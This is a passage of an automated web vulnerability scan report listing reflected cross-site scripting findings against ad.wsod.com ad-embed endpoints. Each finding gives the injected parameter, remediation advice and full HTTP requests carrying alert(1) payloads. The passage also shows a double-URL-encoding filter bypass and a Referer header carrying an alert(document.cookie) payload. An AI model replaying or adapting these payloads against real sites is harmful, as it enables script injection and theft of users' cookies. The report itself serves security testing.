HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1527
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 677e0"-alert(1)-"d0d500f82e2 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number?click=Insert_Click_Track_URL677e0"-alert(1)-"d0d500f82e2 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:39:48 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1556
5.60. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14771"-alert(1)-"6bc375b9650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number?click=Insert_Click_Track_URL&14771"-alert(1)-"6bc375b9650=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 01:40:23 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1559
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce8c8"-alert(1)-"ef2d57917af was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235ce8c8"-alert(1)-"ef2d57917af&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88ae9"-alert(1)-"90a9ad5ee9c was submitted in the AN parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=111050813788ae9"-alert(1)-"90a9ad5ee9c&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d219"-alert(1)-"d40e45bc60b was submitted in the ASID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a3d219"-alert(1)-"d40e45bc60b HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:35 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dab6"-alert(1)-"f599f1b3586 was submitted in the PG parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD5dab6"-alert(1)-"f599f1b3586&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:26 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba586%2522%253balert%25281%2529%252f%252fa487625405a was submitted in the REST URL parameter 2. This input was echoed as ba586";alert(1)//a487625405a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357ba586%2522%253balert%25281%2529%252f%252fa487625405a/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:51:27 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4698d%2522%253balert%25281%2529%252f%252fa11953fd95 was submitted in the REST URL parameter 3. This input was echoed as 4698d";alert(1)//a11953fd95 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x604698d%2522%253balert%25281%2529%252f%252fa11953fd95/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:51:33 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1680
The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdb7c"-alert(1)-"bd1f4188982 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208fdb7c"-alert(1)-"bd1f4188982&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:50:02 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59d14"-alert(1)-"17d20a062e9 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G59d14"-alert(1)-"17d20a062e9&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:43 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77ac7"-alert(1)-"d6a67b2bc13 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!77ac7"-alert(1)-"d6a67b2bc13&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:06 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1681
5.70. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2ee5"-alert(1)-"465aa420697 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a&c2ee5"-alert(1)-"465aa420697=1 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:51:11 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 1684
The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3ba0'-alert(1)-'847a44efb7d was submitted in the &PID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8015235d3ba0'-alert(1)-'847a44efb7d&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 14:49:20 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 14:49:20 GMT; path=/ Set-Cookie: i_1=33:1411:972:100:0:38345:1296398960:L|33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2; expires=Tue, 01-Mar-2011 14:49:20 GMT; path=/ P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 931
function wsodOOBClick() { var i = new Image(); i.src = 'http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235d3ba0'-alert(1)-'847a44efb7d&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a'; var iRM = new Image(); iRM.src = 'http://redcated/action/Scottrade_Remessaging'; return true; } fu ...[SNIP]...
The value of the 10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9d3d'-alert(1)-'889a7271f4a was submitted in the 10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**;10,1,103;1920;1200;http%3A_@2F_@2Fmoneycentral.redacted_@2Finvestor_@2Fcharts_@2Fchartdl.aspx_@3Fsymbol%3Dindu22b72%2522%3Balertdocument.cookie_@2F_@2F2badde9cef5?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!e9d3d'-alert(1)-'889a7271f4a&&PID=8015235&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2
Response
